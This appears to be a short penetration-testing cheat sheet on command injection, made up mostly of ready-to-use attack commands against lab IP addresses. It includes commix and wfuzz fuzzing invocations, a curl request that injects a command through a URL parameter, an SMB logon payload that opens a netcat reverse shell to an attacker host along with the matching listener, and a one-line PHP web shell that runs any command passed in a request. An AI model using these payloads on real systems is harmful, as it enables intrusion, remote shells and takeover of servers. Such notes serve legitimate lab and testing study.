Command Injection – Tools and methods
Below is a list of common tools and methods to test for command injection.
Commix
1 2 |
commix -r /home/workdir/email.req –auth-cred=admin:password –all –batch –level 3 |
wfuzz
1 2 |
wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b “PHPSESSID=077dn044qmuh2ut41tksedvlv2” -d “check=FUZZ” http://10.10.10.105/diag.php |
curl
1 2 3 |
# opt Param vuln to RCE: curl -v “http:/10.10.10.69/sync?opt=’ id’” |
SMB
Following could be used to achieve command execution and pop a reverse shell via poorly configured SMB.
1 2 |
smbclient //10.10.10.3/tmp |
Get command execution.
1 2 3 |
logon “/=`nc 10.10.14.17 1233 -e /bin/bash`” |
Attacker:
1 2 |
nc -lnvp 1233 |
smbmap and smbclient also has switches for command execution over SMB.
PHP
<?php
$cmd=$_GET[‘cmd’];
system($cmd);
?>